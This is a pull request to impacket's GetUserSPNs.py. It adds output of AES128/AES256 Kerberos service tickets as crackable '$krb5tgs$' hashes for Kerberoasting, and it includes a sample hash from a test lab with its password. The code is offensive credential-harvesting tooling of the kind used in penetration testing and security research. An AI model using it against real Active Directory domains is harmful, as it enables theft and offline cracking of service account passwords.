### PR TITLE
Support for AES Kerberoast tickets to GetUserSPNs.py

### DIFF
--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -170,6 +170,24 @@ class GetUserSPNs:
                 print entry
             else:
                 fd.write(entry+'\n')
+        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
+            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
+                constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
+            if fd is None:
+                print entry
+            else:
+                fd.write(entry+'\n')
+        elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
+            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
+                constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
+                hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
+            if fd is None:
+                print entry
+            else:
+                fd.write(entry+'\n')
         else:
             logging.error('Skipping %s/%s due to incompatible e-type %d' % (
                 decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],


### PR DESCRIPTION
Hello,

Me and a colleague have been digging into (AD) Kerberos recently.  The libraries in impacket have been immensely helpful in learning and doing new things, so thanks!

It turns out you can have AD send back AES 128 or AES 256 encrypted TGS-REP tickets(Following the instructions [here](https://blogs.msdn.microsoft.com/openspecification/2011/05/30/windows-configurations-for-kerberos-supported-encryption-type/)), which are the basis for the "hash" in Kerberoasting.  Rather than having these "hashes" be seen as "errors" or ignored, We'd like to have these tickets turned into hashes.  This PR, does that.  Here is an example hash from a test env(password:"Weakpass1"):

```$krb5tgs$18$*s_svc$GOAT.DERBY.LOCAL$HTTP/client.goat.derby.local~8080*$2bb4a60a5cf692fc765212e1cf8e9e51$f92491b832cbe1fe46c50ac7f0cd47294b465f2080c243900944821248b1c29747f3454cd6ba7165683f0efb36c0db589b37c2a934ac141315d93f9bff59f5c137c0ce9cc6f9f98e59472c54add6f144e475646350f571dd6196787dea5931d8eee35c2e0b358b56672530c3a694cadd5d4502699a1cc442ee09bf35ba803a933768a1d95dcd3c014663f29982d786629e96dd4e20366454d5fe62eaae719e8427f22e8c9e0a775422842d7a528b1ff65ee882e722b53dceafb5b719e72885c65af59593c6818bcfa09d1b70ce2706701c5289c2dc311c7aed5fc11a9d131bd64bfc078a5e2474b4bc121e5da9b47586e271e6a9c8f6d7dc4e3a49c0c42661aba90d9ab881af54bf741b26237b8cdd0743aa2d9880d2aa7823a583685e6470dea560f306d0ee5f8daa1bd226901126a56b6304a1f6563e36d33d720e9e6aadfde306e56a4d1757e409f5b47e6e1fa3164309d23a0d73200bf0f9790a6af5fcd0458529d4a4f030f9143262cb952d44cbf805b7c7a7ae855547e0caedbddd5ee82757905967eeef24869d0b3785fbda07fff428ad265158018f73c1aa06388d97cacc952ebedc41ecfec0e03a3f0070531ef54c9cfd7d6cbb414a8253d6878130ae2baac2621d2b7fdb770c78dc3cfe0308e0e650dc7993d6cf341f95b716d4965b4fccf21fb6d1cbc159cf99648f0512bf2baf9f242f7ff8694c012fab7c2325c4d9b649fcc1c58eb962c5e41318b5edfb8a6d41e4b6ddc413cbdfcda205e1c004b1d913db67c9f9b1f16c5edc07bb83455e4c02f81c8349e4f58721b5f81c08ed07b50c6252ed01265f98f050917a22c2f0c99c78ac3cd9e6a4492de82213d868e1d51ae013a02b8f86093920e5abadb7ed890e0917ac707741ac105600b7ad9cff81c96c9144970c9ada5707601caf381d687b128c591920078b5c9433afd04b211a99863baf98e64a90aa2313c180a140d26a8d839cea985e3505bf4bd0114b6c4f759788c1fdbc13a5e047e476edadfd4ebcf2c8a3b0b6ba8bf12d14a3598cb4f677bc309ef581f96c7a8526c70fe52533c168450080ceaba419b28dd2c83116cd9ecd6adb5153db049449c077728480100372e39607b761995dbed7d1e808ef0b32f79bb87cb5fbc0777fa334e8bcebc70fedc482e40af2d10bcb6cf6ec441f10f21043e1a19112bda92a8fe55f6ef1346f8fe4c210b4627baf6854a27f88f6bcf3128cbc2e37afe0193285dbc3741af60a0e402cc33ea3fddd2206601f1ce0df5eddf150739c31ea6ad7892773000416542fade2d7ae34b238d12c11063ffaa80e9c3d7967e2fe373ac61247794a4ed5e8e3c15920e83e```

John and hashcat do not currently support these, but may be more likely to if tools can actually generate the hashes.

Please let me know if you have any suggestions or questions.